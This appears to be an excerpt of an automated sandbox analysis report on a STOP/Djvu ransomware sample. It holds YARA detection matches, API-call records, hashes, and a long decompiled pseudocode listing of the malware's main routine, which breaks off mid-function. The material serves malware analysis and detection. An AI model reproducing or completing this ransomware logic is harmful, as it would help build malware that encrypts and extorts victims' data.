                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low


                                                                                    Execution Graph

                                                                                    Execution Coverage:6.3%
                                                                                    Dynamic/Decrypted Code Coverage:66.7%
                                                                                    Signature Coverage:55.6%
                                                                                    Total number of Nodes:18
                                                                                    Total number of Limit Nodes:1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 041D07EE
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 041D080E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: e5840d231d125eeef6f5c76cca4c7e65896d014f3f551cae20118bce417687c3
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: C1F062716007156BD7203BB5A8CDAAF7AE8AF4D729F100668E643950C0DB70F8458A61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 041D04D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: c8e0495c9ff6c24fb8ab1103123085bbca9e7587ab0f01179826232d740ef6be
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: 66112B79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B361D371EA90DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                    • Instruction ID: 2ab5d353bc644efc4e315ab927be19a350d96c4127aa5a6920fa60c0ba30f13d
                                                                                    • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                    • Instruction Fuzzy Hash: D63169B580A245EFCB15CE70D8D0AF5BB71EF87324F1989ECD4858B112D3356046C794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction ID: 06cd15964a83e9d95e990096e84b54c6c4e59af4ef0fefe2af569bb0b4dc197d
                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction Fuzzy Hash: DD1130B2340101AFD754DE55DCC1FA677EAEB8D268B1980A5ED08CB316E775E842C760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.6%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:42.6%
                                                                                    Total number of Nodes:702
                                                                                    Total number of Limit Nodes:16
                                                                                    C-Code - Quality: 85%
                                                                                    			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
                                                                                    				intOrPtr _v0;
                                                                                    				int _v4;
                                                                                    				long _v8;
                                                                                    				WCHAR** _v12;
                                                                                    				short* _v16;
                                                                                    				int _v20;
                                                                                    				CHAR* _v24;
                                                                                    				int _v28;
                                                                                    				int _v32;
                                                                                    				int _v36;
                                                                                    				int _v40;
                                                                                    				int _v44;
                                                                                    				int _v48;
                                                                                    				int _v52;
                                                                                    				int _v56;
                                                                                    				char _v60;
                                                                                    				char _v64;
                                                                                    				char _v68;
                                                                                    				char _v72;
                                                                                    				char _v76;
                                                                                    				char _v80;
                                                                                    				char _v84;
                                                                                    				char _v88;
                                                                                    				char _v92;
                                                                                    				char _v96;
                                                                                    				char _v100;
                                                                                    				char _v104;
                                                                                    				char _v108;
                                                                                    				char _v112;
                                                                                    				char _v116;
                                                                                    				char _v120;
                                                                                    				char _v124;
                                                                                    				char _v128;
                                                                                    				char _v132;
                                                                                    				void* __esi;
                                                                                    				void* _t525;
                                                                                    				void* _t526;
                                                                                    				void* _t528;
                                                                                    				int _t530;
                                                                                    				void* _t534;
                                                                                    				void* _t535;
                                                                                    				void* _t536;
                                                                                    				void* _t556;
                                                                                    				int _t557;
                                                                                    				WCHAR** _t566;
                                                                                    				void* _t570;
                                                                                    				void* _t573;
                                                                                    				int _t581;
                                                                                    				void* _t585;
                                                                                    				void* _t588;
                                                                                    				intOrPtr* _t590;
                                                                                    				int _t592;
                                                                                    				void* _t594;
                                                                                    				CHAR* _t596;
                                                                                    				void* _t599;
                                                                                    				void* _t602;
                                                                                    				void* _t608;
                                                                                    				void* _t614;
                                                                                    				int* _t618;
                                                                                    				short* _t677;
                                                                                    				void* _t697;
                                                                                    				void* _t707;
                                                                                    				void* _t723;
                                                                                    				void* _t727;
                                                                                    				long _t728;
                                                                                    				long _t729;
                                                                                    				void* _t730;
                                                                                    				void* _t746;
                                                                                    				long _t747;
                                                                                    				void* _t751;
                                                                                    				void* _t754;
                                                                                    				long _t755;
                                                                                    				void* _t759;
                                                                                    				void* _t765;
                                                                                    				signed int _t770;
                                                                                    				void* _t773;
                                                                                    				void* _t780;
                                                                                    				void* _t782;
                                                                                    				void* _t784;
                                                                                    				void* _t788;
                                                                                    				signed int _t789;
                                                                                    				void* _t790;
                                                                                    				void* _t799;
                                                                                    				void* _t800;
                                                                                    				void* _t817;
                                                                                    				void* _t828;
                                                                                    				void* _t839;
                                                                                    				short* _t846;
                                                                                    				void* _t856;
                                                                                    				void* _t859;
                                                                                    				char* _t861;
                                                                                    				void* _t865;
                                                                                    				long _t868;
                                                                                    				intOrPtr* _t879;
                                                                                    				void* _t881;
                                                                                    				void* _t895;
                                                                                    				void* _t896;
                                                                                    				void* _t897;
                                                                                    				void* _t898;
                                                                                    				void* _t899;
                                                                                    				void* _t901;
                                                                                    				void* _t903;
                                                                                    				long _t916;
                                                                                    				signed int _t917;
                                                                                    				void* _t919;
                                                                                    				WCHAR** _t923;
                                                                                    				WCHAR** _t949;
                                                                                    				WCHAR* _t950;
                                                                                    				void* _t952;
                                                                                    				int* _t955;
                                                                                    				int* _t958;
                                                                                    				int* _t960;
                                                                                    				intOrPtr _t962;
                                                                                    				int _t966;
                                                                                    				WCHAR** _t968;
                                                                                    				void* _t969;
                                                                                    				void* _t974;
                                                                                    				intOrPtr* _t982;
                                                                                    				void* _t983;
                                                                                    				intOrPtr* _t986;
                                                                                    				void* _t987;
                                                                                    				WCHAR* _t989;
                                                                                    				signed int _t990;
                                                                                    				signed int _t991;
                                                                                    				WCHAR* _t995;
                                                                                    				signed int _t996;
                                                                                    				signed int _t997;
                                                                                    				WCHAR* _t1000;
                                                                                    				signed int _t1001;
                                                                                    				signed int _t1002;
                                                                                    				intOrPtr* _t1005;
                                                                                    				void* _t1006;
                                                                                    				char* _t1008;
                                                                                    				intOrPtr* _t1011;
                                                                                    				void* _t1012;
                                                                                    				char* _t1014;
                                                                                    				intOrPtr* _t1017;
                                                                                    				void* _t1018;
                                                                                    				char* _t1020;
                                                                                    				intOrPtr* _t1136;
                                                                                    				void* _t1137;
                                                                                    				short* _t1142;
                                                                                    				void* _t1145;
                                                                                    				intOrPtr _t1159;
                                                                                    				intOrPtr _t1161;
                                                                                    				intOrPtr* _t1164;
                                                                                    				intOrPtr* _t1167;
                                                                                    				short* _t1168;
                                                                                    				short* _t1171;
                                                                                    				short* _t1173;
                                                                                    				intOrPtr* _t1175;
                                                                                    				intOrPtr* _t1178;
                                                                                    				intOrPtr* _t1181;
                                                                                    				intOrPtr* _t1191;
                                                                                    				int _t1197;
                                                                                    				int _t1198;
                                                                                    				WCHAR* _t1199;
                                                                                    				short* _t1200;
                                                                                    				signed int _t1201;
                                                                                    				signed int _t1202;
                                                                                    				signed int _t1204;
                                                                                    				short* _t1205;
                                                                                    				signed int _t1206;
                                                                                    				int* _t1207;
                                                                                    				signed int _t1208;
                                                                                    				int* _t1209;
                                                                                    				signed int _t1210;
                                                                                    				int* _t1211;
                                                                                    				intOrPtr* _t1212;
                                                                                    				unsigned int _t1215;
                                                                                    				signed int _t1217;
                                                                                    				void* _t1220;
                                                                                    				int* _t1226;
                                                                                    				void* _t1227;
                                                                                    				int _t1230;
                                                                                    				short* _t1231;
                                                                                    				int _t1232;
                                                                                    				int _t1233;
                                                                                    				int _t1234;
                                                                                    				int _t1235;
                                                                                    				char _t1236;
                                                                                    				int _t1242;
                                                                                    				signed int _t1244;
                                                                                    				short* _t1245;
                                                                                    				long _t1248;
                                                                                    				void* _t1249;
                                                                                    				signed int _t1263;
                                                                                    				signed int _t1264;
                                                                                    				void* _t1266;
                                                                                    				void* _t1268;
                                                                                    				void* _t1269;
                                                                                    				short* _t1270;
                                                                                    				void* _t1271;
                                                                                    				short* _t1272;
                                                                                    				void* _t1273;
                                                                                    				void* _t1274;
                                                                                    				char* _t1275;
                                                                                    				void* _t1276;
                                                                                    				void* _t1277;
                                                                                    				char* _t1278;
                                                                                    				void* _t1279;
                                                                                    				void* _t1280;
                                                                                    				char* _t1281;
                                                                                    				void* _t1282;
                                                                                    				void* _t1283;
                                                                                    				void* _t1284;
                                                                                    				void* _t1285;
                                                                                    				void* _t1286;
                                                                                    				void* _t1290;
                                                                                    				void* _t1292;
                                                                                    				short* _t1294;
                                                                                    
                                                                                    				_t1264 = _t1263 & 0xfffffff8;
                                                                                    				E0042F7C0(0x14c4);
                                                                                    				_push(__ebx);
                                                                                    				_push(__edi);
                                                                                    				 *0x513244 = _a4; // executed
                                                                                    				_t525 = E0040CF10(); // executed
                                                                                    				if(_t525 == 0) {
                                                                                    					_t526 = GetCurrentProcess();
                                                                                    					GetLastError();
                                                                                    					_t528 = SetPriorityClass(_t526, 0x80); // executed
                                                                                    					__eflags = _t528;
                                                                                    					if(__eflags == 0) {
                                                                                    						GetLastError();
                                                                                    					}
                                                                                    					_t1226 =  *0x529228; // 0x6dcce8
                                                                                    					_a52 = 0;
                                                                                    					_a56 = 0;
                                                                                    					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
                                                                                    					_t1159 =  *0x52922c; // 0x0
                                                                                    					_t974 = 0xffffffe - _t1159;
                                                                                    					_t1197 = _t530;
                                                                                    					__eflags = _t974 - 1;
                                                                                    					if(__eflags < 0) {
                                                                                    						_push("list<T> too long");
                                                                                    						E0044F23E(__eflags);
                                                                                    						goto L213;
                                                                                    					} else {
                                                                                    						 *0x52922c = _t1159 + 1;
                                                                                    						_t1226[1] = _t1197;
                                                                                    						 *( *(_t1197 + 4)) = _t1197;
                                                                                    						_t556 = E00419D10( &_a984);
                                                                                    						_t1226 =  *0x513268;
                                                                                    						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
                                                                                    						_t1161 =  *0x51326c;
                                                                                    						_t974 = 0x1cb189 - _t1161;
                                                                                    						_t1198 = _t557;
                                                                                    						__eflags = _t974 - 1;
                                                                                    						if(__eflags < 0) {
                                                                                    							L213:
                                                                                    							_push("list<T> too long");
                                                                                    							E0044F23E(__eflags);
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							_push(_t1226);
                                                                                    							_t1227 = _t974;
                                                                                    							__eflags =  *(_t1227 + 0x8dc) - 0x10;
                                                                                    							if( *(_t1227 + 0x8dc) >= 0x10) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x8dc) = 0xf;
                                                                                    							 *(_t1227 + 0x8d8) = 0;
                                                                                    							 *((char*)(_t1227 + 0x8c8)) = 0;
                                                                                    							__eflags =  *(_t1227 + 0x8b8) - 8;
                                                                                    							if( *(_t1227 + 0x8b8) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x8b8) = 7;
                                                                                    							 *(_t1227 + 0x8b4) = 0;
                                                                                    							 *((short*)(_t1227 + 0x8a4)) = 0;
                                                                                    							_t534 =  *(_t1227 + 0x898);
                                                                                    							__eflags = _t534;
                                                                                    							if(_t534 != 0) {
                                                                                    								E00414F10(_t534,  *(_t1227 + 0x89c));
                                                                                    								L00422587( *(_t1227 + 0x898));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    								 *(_t1227 + 0x898) = 0;
                                                                                    								 *(_t1227 + 0x89c) = 0;
                                                                                    								 *(_t1227 + 0x8a0) = 0;
                                                                                    							}
                                                                                    							_t535 =  *(_t1227 + 0x88c);
                                                                                    							__eflags = _t535;
                                                                                    							if(_t535 != 0) {
                                                                                    								E00414F10(_t535,  *(_t1227 + 0x890));
                                                                                    								L00422587( *(_t1227 + 0x88c));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    								 *(_t1227 + 0x88c) = 0;
                                                                                    								 *(_t1227 + 0x890) = 0;
                                                                                    								 *(_t1227 + 0x894) = 0;
                                                                                    							}
                                                                                    							_t536 =  *(_t1227 + 0x880);
                                                                                    							__eflags = _t536;
                                                                                    							if(_t536 != 0) {
                                                                                    								E00414F10(_t536,  *(_t1227 + 0x884));
                                                                                    								L00422587( *(_t1227 + 0x880));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    								 *(_t1227 + 0x880) = 0;
                                                                                    								 *(_t1227 + 0x884) = 0;
                                                                                    								 *(_t1227 + 0x888) = 0;
                                                                                    							}
                                                                                    							__eflags =  *(_t1227 + 0x87c) - 8;
                                                                                    							if( *(_t1227 + 0x87c) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x87c) = 7;
                                                                                    							 *(_t1227 + 0x878) = 0;
                                                                                    							 *((short*)(_t1227 + 0x868)) = 0;
                                                                                    							__eflags =  *(_t1227 + 0x864) - 8;
                                                                                    							if( *(_t1227 + 0x864) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x864) = 7;
                                                                                    							 *(_t1227 + 0x860) = 0;
                                                                                    							 *((short*)(_t1227 + 0x850)) = 0;
                                                                                    							__eflags =  *(_t1227 + 0x84c) - 8;
                                                                                    							if( *(_t1227 + 0x84c) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x84c) = 7;
                                                                                    							 *(_t1227 + 0x848) = 0;
                                                                                    							 *((short*)(_t1227 + 0x838)) = 0;
                                                                                    							__eflags =  *(_t1227 + 0x834) - 8;
                                                                                    							if( *(_t1227 + 0x834) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							 *(_t1227 + 0x834) = 7;
                                                                                    							 *(_t1227 + 0x830) = 0;
                                                                                    							 *((short*)(_t1227 + 0x820)) = 0;
                                                                                    							__eflags =  *(_t1227 + 0x1c) - 8;
                                                                                    							if( *(_t1227 + 0x1c) >= 8) {
                                                                                    								L00422587( *((intOrPtr*)(_t1227 + 8)));
                                                                                    							}
                                                                                    							 *(_t1227 + 0x1c) = 7;
                                                                                    							__eflags = 0;
                                                                                    							 *(_t1227 + 0x18) = 0;
                                                                                    							 *((short*)(_t1227 + 8)) = 0;
                                                                                    							return 0;
                                                                                    						} else {
                                                                                    							 *0x51326c = _t1161 + 1;
                                                                                    							_t1226[1] = _t1198;
                                                                                    							 *( *(_t1198 + 4)) = _t1198;
                                                                                    							L214();
                                                                                    							_a32 = 0;
                                                                                    							_a44 = 0;
                                                                                    							_t1230 =  *( *0x513268);
                                                                                    							_v4 = _t1230;
                                                                                    							_a52 = _t1230;
                                                                                    							E00413A90(0,  &_a128, _t1198, 0x400);
                                                                                    							_t1199 = _a124;
                                                                                    							GetModuleFileNameW(0, _t1199, 0x400);
                                                                                    							PathRemoveFileSpecW(_t1199);
                                                                                    							_push(_a72);
                                                                                    							_a180 = 7;
                                                                                    							_a176 = 0;
                                                                                    							_a160 = 0;
                                                                                    							E00418400( &_a160, _t1199, _a128);
                                                                                    							_t1200 = _t1230 + 0x10;
                                                                                    							__eflags = _t1200 -  &_a148;
                                                                                    							if(_t1200 !=  &_a148) {
                                                                                    								__eflags =  *(_t1200 + 0x14) - 8;
                                                                                    								if( *(_t1200 + 0x14) >= 8) {
                                                                                    									L00422587( *_t1200);
                                                                                    									_t1264 = _t1264 + 4;
                                                                                    								}
                                                                                    								__eflags = 0;
                                                                                    								 *(_t1200 + 0x14) = 7;
                                                                                    								 *(_t1200 + 0x10) = 0;
                                                                                    								 *_t1200 = 0;
                                                                                    								E004145A0(_t1200,  &_a160);
                                                                                    							}
                                                                                    							__eflags = _a180 - 8;
                                                                                    							if(_a180 >= 8) {
                                                                                    								L00422587(_a160);
                                                                                    								_t1264 = _t1264 + 4;
                                                                                    							}
                                                                                    							_a44 = 0;
                                                                                    							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
                                                                                    							_a28 = _t566;
                                                                                    							lstrcpyW( &_a3252,  *_t566);
                                                                                    							_t1201 = 1;
                                                                                    							__eflags = _a36 - 1;
                                                                                    							if(_a36 <= 1) {
                                                                                    								L26:
                                                                                    								GlobalFree(_a28);
                                                                                    								__eflags =  *0x513235;
                                                                                    								if( *0x513235 == 0) {
                                                                                    									_t570 = E00412220(); // executed
                                                                                    									__eflags = _t570 - 1;
                                                                                    								} else {
                                                                                    									__eflags = E00412220() - 2;
                                                                                    								}
                                                                                    								if(__eflags <= 0) {
                                                                                    									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
                                                                                    									_t949 = _v12;
                                                                                    									_t1266 = _t1264 + 4;
                                                                                    									_a148 = 0xf;
                                                                                    									_t1202 = 0;
                                                                                    									__eflags = 0;
                                                                                    									_a144 = 0;
                                                                                    									_a128 = 0;
                                                                                    									do {
                                                                                    										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
                                                                                    										__eflags =  *_t1164;
                                                                                    										if( *_t1164 != 0) {
                                                                                    											_t982 = _t1164;
                                                                                    											_v12 = _t982 + 1;
                                                                                    											do {
                                                                                    												_t573 =  *_t982;
                                                                                    												_t982 = _t982 + 1;
                                                                                    												__eflags = _t573;
                                                                                    											} while (_t573 != 0);
                                                                                    											_t983 = _t982 - _v12;
                                                                                    											__eflags = _t983;
                                                                                    										} else {
                                                                                    											_t983 = 0;
                                                                                    										}
                                                                                    										_push(_t983);
                                                                                    										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
                                                                                    										_t1202 = _t1202 + 1;
                                                                                    										__eflags = _t1202 - 0xa;
                                                                                    									} while (_t1202 < 0xa);
                                                                                    									__eflags = _a144 - 0x10;
                                                                                     									_t576 = (_a144 >= 0x10) ? _a124 :  &_a124;
                                                                                     									_push((_a144 >= 0x10) ? _a124 :  &_a124);
                                                                                    									 *(_t1230 + 0x8cc) = E00423C24();
                                                                                    									_a220 = 7;
                                                                                    									_a200 = 0;
                                                                                    									_a288 = 0;
                                                                                    									_a272.hwnd = 0;
                                                                                    									_a216 = 0;
                                                                                    									_a292 = 7;
                                                                                    									E00411CD0(_t949,  &_a272,  &_a200); // executed
                                                                                    									_t581 = _a16;
                                                                                    									_t1268 = _t1266 + 8;
                                                                                    									_t950 = _a28;
                                                                                    									__eflags = _t581;
                                                                                    									if(_t581 != 0) {
                                                                                    										L59:
                                                                                    										 *(_t1230 + 0x8cc) = 0;
                                                                                    									} else {
                                                                                    										__eflags = _t950;
                                                                                    										if(_t950 != 0) {
                                                                                    											goto L59;
                                                                                    										} else {
                                                                                    											_a12 = 7;
                                                                                    											_push(0xffffffff);
                                                                                    											_v8 = 0;
                                                                                    											_a8 = 0;
                                                                                    											E00414690(_t950,  &_v8,  &_a200, 0);
                                                                                    											_t1294 = _t1268 - 0x18;
                                                                                    											_t1142 = _t1294;
                                                                                    											_push(0xffffffff);
                                                                                    											 *(_t1142 + 0x14) = 7;
                                                                                    											 *(_t1142 + 0x10) = 0;
                                                                                    											 *_t1142 = 0;
                                                                                    											E00414690(_t950, _t1142,  &_v20, 0);
                                                                                    											E0040D240( *(_t1230 + 0x8cc)); // executed
                                                                                    											_t1268 = _t1294 + 0x18;
                                                                                    											__eflags = _v12 - 8;
                                                                                    											if(_v12 >= 8) {
                                                                                    												L00422587(_v16);
                                                                                    												_t1268 = _t1268 + 4;
                                                                                    											}
                                                                                    											_t581 = _a8;
                                                                                    										}
                                                                                    									}
                                                                                    									__eflags =  *0x513235;
                                                                                    									if( *0x513235 != 0) {
                                                                                    										L60:
                                                                                    										E00411A10();
                                                                                    										goto L61;
                                                                                    									} else {
                                                                                    										__eflags = _t581;
                                                                                    										if(_t581 != 0) {
                                                                                    											L62:
                                                                                    											__eflags =  *0x513234;
                                                                                    											if(__eflags != 0) {
                                                                                    												goto L81;
                                                                                    											} else {
                                                                                    												__eflags = _t581;
                                                                                    												if(__eflags == 0) {
                                                                                    													__eflags = _t950;
                                                                                    													if(__eflags == 0) {
                                                                                    														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
                                                                                    														_t1245 = _v16;
                                                                                    														_t1268 = _t1268 + 4;
                                                                                    														_a108 = 0xf;
                                                                                    														_t1217 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_a104.hwnd = 0;
                                                                                    														_a88 = _t950;
                                                                                    														do {
                                                                                    															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
                                                                                    															__eflags =  *_t1191;
                                                                                    															if( *_t1191 != 0) {
                                                                                    																_t1136 = _t1191;
                                                                                    																_t950 = _t1136 + 1;
                                                                                    																do {
                                                                                    																	_t859 =  *_t1136;
                                                                                    																	_t1136 = _t1136 + 1;
                                                                                    																	__eflags = _t859;
                                                                                    																} while (_t859 != 0);
                                                                                    																_t1137 = _t1136 - _t950;
                                                                                    																__eflags = _t1137;
                                                                                    															} else {
                                                                                    																_t1137 = 0;
                                                                                    															}
                                                                                    															_push(_t1137);
                                                                                    															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
                                                                                    															_t1217 = _t1217 + 1;
                                                                                    															__eflags = _t1217 - 0x10;
                                                                                    														} while (_t1217 < 0x10);
                                                                                    														_t861 =  &_a84;
                                                                                    														_t1140 =  &(_v24[0x8d0]);
                                                                                    														__eflags =  &(_v24[0x8d0]) - _t861;
                                                                                    														if( &(_v24[0x8d0]) != _t861) {
                                                                                    															_push(0xffffffff);
                                                                                    															E00413FF0(_t950, _t1140, _t861, 0);
                                                                                    														}
                                                                                    														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
                                                                                    														__eflags = _a100 - 0x10;
                                                                                    														 *0x513254 = _t865;
                                                                                    														if(__eflags >= 0) {
                                                                                    															L00422587(_a80);
                                                                                    															_t1268 = _t1268 + 4;
                                                                                    														}
                                                                                    													}
                                                                                    												}
